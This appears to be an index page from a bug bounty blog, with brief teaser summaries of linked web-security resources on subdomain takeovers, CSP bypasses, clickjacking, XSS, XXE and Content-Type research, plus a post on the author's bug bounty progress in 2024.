Subdomain takeovers are not my thing but if they’re yours, go and read this guide. It described not only techniques for finding subdomain takeovers but also multiple ways to exploit them to show the maximum impact....
#81
The website with known CSP bypasses
Renniepak created a website where we can all find known CSP bypasses. It’s great because I’m nowhere near remembering all these and, unfortunately, I also don’t have a habit of writing these things down when I encounter them. Not to mention they are difficult to...
Using YouTube to steal your files
This writeup involves multiple open redirects, iframes, and then more open redirects and ends up with clickjacking that gives the attacker access to your GDrive files. It also is another example that if you actually understand clickjacking and you create a good POC,...
Beyond XSS: Explore the Web Front-end Security Universe
This is an excellent resource about XSS and other client-side bugs! It describes a lot of techniques like mXSS, CSS injection, cookie bombing and many more. Basically, things that are on such a level where you rarely have one resource gathering as many of them....
Automating XXE hunt with AI
Personally, I don’t test for XXEs as often as I should. One of the reasons is that, especially for a docx-based XXE, it’s quite a lot of work to put the payload, repackage the archive etc. STÖK is someone that loves XXE and he wrote a series of tweets describing how...
Content-Type research
BlackFan has a great GitHub repo with some research about the Content-Type header. If you want to see what response content types allow XSS or which request CT values cause the preflight request to be sent, this is the place to go....
5 things that skyrocketed by bug bounty progress in 2024
My bug bounty game skyrocketed in 2024 compared to previous years. After only 3 quarters, I already submitted many more reports than in 2023 and earned over double of my 2023 bug bounty income. I also participated in two rounds of the Hackerone Ambassador World Cup...